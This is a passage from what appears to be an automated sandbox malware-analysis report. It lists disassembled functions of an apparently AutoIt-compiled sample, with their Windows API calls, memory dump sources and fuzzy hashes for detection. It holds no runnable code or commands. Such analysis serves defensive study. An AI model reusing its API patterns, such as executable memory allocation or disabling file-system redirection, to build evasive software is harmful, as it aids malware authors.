                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 1bc186675adcaf55cdbcfe7c696c184d884d5dd99ea94b30d8e13f4e3c75bb10
                            • Instruction ID: c59548cfff72188e16e60aea33bca3a31e5868ad2c2a4183cbc4c909095c58f4
                            • Opcode Fuzzy Hash: 1bc186675adcaf55cdbcfe7c696c184d884d5dd99ea94b30d8e13f4e3c75bb10
                            • Instruction Fuzzy Hash: 4D412D76900219BEDF10DFA8CC91ADEBBB8EB09300F044199FA55B7191DA716E45CBB0
                            Function 00DC7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC79DF
                            • GetWindowLongW.USER32 ref: 00DC79FC
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC7A0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Long
                            • String ID: SysTreeView32
                            • API String ID: 847901565-1698111956
                            • Opcode ID: 2d89635d4d073ca2b3c4ee6181f82134ed55c14306310fdadfcc7342a4027382
                            • Instruction ID: cb6af718981a759db8bebb608099a263b5995533adf68cda0497bcc1ddd94e0d
                            • Opcode Fuzzy Hash: 2d89635d4d073ca2b3c4ee6181f82134ed55c14306310fdadfcc7342a4027382
                            • Instruction Fuzzy Hash: 62317E31204606ABDB119F34CC45FEA77A9EB45324F244729F979E32E0DB31E9519B70
                            Function 00DC73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DC7461
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DC7475
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC7499
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: 4cded8e7c70de46260cb8908aa5a3dbf2ddd51417db747b52d98cb0c2b38dc3b
                            • Instruction ID: 655f81ad24bfc566a2383d4505cd8a39428df5ba1cf52aa05fe60f8b98f8f14c
                            • Opcode Fuzzy Hash: 4cded8e7c70de46260cb8908aa5a3dbf2ddd51417db747b52d98cb0c2b38dc3b
                            • Instruction Fuzzy Hash: E221B13250421AAFDF158F64CC42FEA3B69EB48724F150218FE156B190DA75AC95DBB0
                            Function 00DC7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DC7C4A
                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DC7C58
                            • DestroyWindow.USER32 ref: 00DC7C5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$DestroyWindow
                            • String ID: msctls_updown32
                            • API String ID: 4014797782-2298589950
                            • Opcode ID: cd8668fb5f2f54b3fbedfc6c6e0064c9b9352c07d49345cb7f5451bd9917c73a
                            • Instruction ID: 89cc5d1b8db31734759c0bd0e7f92d3f1c5a8ed10f2bc0cb4a151cff6a29c037
                            • Opcode Fuzzy Hash: cd8668fb5f2f54b3fbedfc6c6e0064c9b9352c07d49345cb7f5451bd9917c73a
                            • Instruction Fuzzy Hash: 9C217CB560420AAFDB10DF64DCC1EA737EDEB59364B144459FA059B3A1CB32EC518E70
                            Function 00DC6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DC6D3B
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DC6D4B
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6D70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: 36aa85b8da6c059439896c44032ae41cc63d84a708e67b42a2136dce1eb3aa62
                            • Instruction ID: 318f036386579fa20d2117ffe9ba526e2ccb547967d8925af85907360ee93fae
                            • Opcode Fuzzy Hash: 36aa85b8da6c059439896c44032ae41cc63d84a708e67b42a2136dce1eb3aa62
                            • Instruction Fuzzy Hash: 2F218E32610119BFEF118F54CC85FAB3BAAEF89760F058129FA459B1A0CA71DC519BB0
                            Function 00DC770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DC7772
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DC7787
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DC7794
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: 24b79f1d1c77923fa6c47d9e732d69f451e1c15a79541d76739b593aef236789
                            • Instruction ID: 8d7716425162dc5a9ee75b089e42910a8a09beff330d6cb40e139bc3f18cb5b2
                            • Opcode Fuzzy Hash: 24b79f1d1c77923fa6c47d9e732d69f451e1c15a79541d76739b593aef236789
                            • Instruction Fuzzy Hash: FE11E27264020ABAEB105F61CC01FE77B69EB88B64F11411CF641A20D0C272E8518B30
                            Function 00D44C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44C11
                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44C23
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-3689287502
                            • Opcode ID: c2e8e2c60a73c894bb20448d50067089a1ffd29f1f8624ed30d09d88dfb66e14
                            • Instruction ID: dd6c1dd9f8d251b2fa6c713124a944824e7673d9d97c1234bd5f21a4acbb6da9
                            • Opcode Fuzzy Hash: c2e8e2c60a73c894bb20448d50067089a1ffd29f1f8624ed30d09d88dfb66e14
                            • Instruction Fuzzy Hash: 11D0EC35911713CFD7205F71D948A46BAD6AF09351B1DC8399486D6250E6B0D8848670
                            Function 00D44C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00D44C44
                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D44C56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-1355242751
                            • Opcode ID: 0134ab064abdf8e9703ebc20f4e22b27fef5de2d25d964b5fb74118ed45a9fdb
                            • Instruction ID: 5c2aa1a541b8a7330b77aa72ffbb01e5f31273470daadb099a89765e954ebce8
                            • Opcode Fuzzy Hash: 0134ab064abdf8e9703ebc20f4e22b27fef5de2d25d964b5fb74118ed45a9fdb
                            • Instruction Fuzzy Hash: FAD01731510723CFD7209F31D948B9AB6E6AF05351B29C83E9596D6264E770D8C4CA70
                            Function 00DC0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DC0DF5
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DC0E07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: 93e5d6bcdfc97cf74fd86ff6213c2b4423394929dd604ec59baead663e07d35e
                            • Instruction ID: 67c56790f341257c127a47ac1b2c39be503d7cc4a5665f6e515c907cbe893385
                            • Opcode Fuzzy Hash: 93e5d6bcdfc97cf74fd86ff6213c2b4423394929dd604ec59baead663e07d35e
                            • Instruction Fuzzy Hash: 88D01271950717CFD7205F75C808B96B6D9AF04351F19CC3DA585D6251D6B0D490C670
                            Function 00DB90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00DB90EE
                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,00DCF910), ref: 00DB9100
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetModuleHandleExW$kernel32.dll
                            • API String ID: 2574300362-199464113
                            • Opcode ID: 9551c2c44b54e5f328f6ff3d3057b09fd597bf65e35b84e0f2466c220b899fcb
                            • Instruction ID: 6c4166831c44a32be133e5895493f2e1a932430a173966b72eeb9bf52adb696f
                            • Opcode Fuzzy Hash: 9551c2c44b54e5f328f6ff3d3057b09fd597bf65e35b84e0f2466c220b899fcb
                            • Instruction Fuzzy Hash: 21D01235510713CFD7209F35D818A86B6D6AF05391B1AC83D9586D6650E770C880D670
                            Function 00D81714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: 4b9ccd58903ca74a2d719f417b960e9191e370f18f9f6753d14a896bea150d22
                            • Instruction ID: 9b31c22a43f37c3e8452740a16b05155259434aa7cfae80e0aa782190e310916
                            • Opcode Fuzzy Hash: 4b9ccd58903ca74a2d719f417b960e9191e370f18f9f6753d14a896bea150d22
                            • Instruction Fuzzy Hash: 90D012B5805219EBC700A7909C88CF9737CA718301F140566B546D2050E261C759D735
                            Function 00D9717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
                            • Instruction ID: e7083e2a7f4081afa9576c322b8a60ca6537fcd1d240db01b4945225f563476f
                            • Opcode Fuzzy Hash: d918bd8a6a90871f8eac9e91b6786cffbcb97bfc62810bad854617ad1562e29d
                            • Instruction Fuzzy Hash: 1FC16E74A14216EFCF14CFA8C884EAEBBB5FF48714B158598E805EB251D730ED81DBA0
                            Function 00DBE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DBE0BE
                            • CharLowerBuffW.USER32(?,?), ref: 00DBE101
                              • Part of subcall function 00DBD7A5: CharLowerBuffW.USER32(?,?), ref: 00DBD7C5
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DBE301
                            • _memmove.LIBCMT ref: 00DBE314
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: bedfadb4d56fbe89e17b22867a9377582d17b02bdea6a4ea4ca07f6befa63e8d
                            • Instruction ID: c11e1e36e58d32113e62c908bb60b3b9bd65e269652f5092f50ada7f6baeaa30
                            • Opcode Fuzzy Hash: bedfadb4d56fbe89e17b22867a9377582d17b02bdea6a4ea4ca07f6befa63e8d
                            • Instruction Fuzzy Hash: BAC11671604301DFC714DF28C4809AABBE4FF89754F14896EF89A9B351D731E946CBA1
                            Function 00DB8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00DB80C3
                            • CoUninitialize.OLE32 ref: 00DB80CE
                              • Part of subcall function 00D9D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00D9D5D4
                            • VariantInit.OLEAUT32(?), ref: 00DB80D9
                            • VariantClear.OLEAUT32(?), ref: 00DB83AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            • Opcode ID: 9987928e265e3a1032905a1753c4555044ca3030b404100990c921359ce15284
                            • Instruction ID: 5b00db382b9c667c9756d250de1413bf8c0e57cbdf2b6d761c64fc5f7e58d1f3
                            • Opcode Fuzzy Hash: 9987928e265e3a1032905a1753c4555044ca3030b404100990c921359ce15284
                            • Instruction Fuzzy Hash: C8A15875604701DFCB10DF69C891A6AB7E8FF89364F084458F9969B3A1CB30EC05DBA6
                            Function 00D97530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                            Download Yara Rule
                            APIs
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00D976EA
                            • CoTaskMemFree.OLE32(00000000), ref: 00D97702
                            • CLSIDFromProgID.OLE32(?,?), ref: 00D97727
                            • _memcmp.LIBCMT ref: 00D97748
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FromProg$FreeTask_memcmp
                            • String ID:
                            • API String ID: 314563124-0
                            • Opcode ID: bc66d8f1f661e604b568a368efa1ace5469dc472b4533fac5b92aa1a51440ccb
                            • Instruction ID: 1cf9dd38df197d6046a2de7ee142bd6bb6bb06be73ef4e69b412838301ed48ff
                            • Opcode Fuzzy Hash: bc66d8f1f661e604b568a368efa1ace5469dc472b4533fac5b92aa1a51440ccb
                            • Instruction Fuzzy Hash: 8581EA75A10109EFCF04DFA4C984EEEB7B9FF89315F244558E505AB250DB71AE06CB60
                            Function 00D9687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 015a12eb172295adecb429dea9b7e8d8dc06f7662807339eaef62086b5bb2128
                            • Instruction ID: 1ca8c561bb92ef63b51785dfe1ef74803ee8a93ced29615c9ef7d2323b764756
                            • Opcode Fuzzy Hash: 015a12eb172295adecb429dea9b7e8d8dc06f7662807339eaef62086b5bb2128
                            • Instruction Fuzzy Hash: 88518F74604302ABDF24AF65D891A6EB3A5EF45310F24D81FE596EB291EB74D8408B31
                            Function 00DC97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(00935190,?), ref: 00DC9863
                            • ScreenToClient.USER32(00000002,00000002), ref: 00DC9896
                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00DC9903
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ClientMoveRectScreen
                            • String ID:
                            • API String ID: 3880355969-0
                            • Opcode ID: 43a74662a1b50d322a0799c5bae24e3b7f5d16ee0ece45151be6e10a10d3708e
                            • Instruction ID: 0f11554db24cc4dbac1c124cd7816c7b6b9aaed6ceb5377fe570cb71d46b6298
                            • Opcode Fuzzy Hash: 43a74662a1b50d322a0799c5bae24e3b7f5d16ee0ece45151be6e10a10d3708e
                            • Instruction Fuzzy Hash: 48510D35A00206AFDF14CF54C894EAEBBB5EF55360F14816DF8559B2A0DB31AD81CFA0
                            Function 00D99A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D99AD2
                            • __itow.LIBCMT ref: 00D99B03
                              • Part of subcall function 00D99D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D99DBE
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D99B6C
                            • __itow.LIBCMT ref: 00D99BC3
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: 320aa51dbbc5344dfaf843bacf57c176666718d0dc4b19467a3c0bb54c6b40d7
                            • Instruction ID: e5da9fb59846e19e761ce403086183d566c6b085d9556c72a4c2d724757212b4
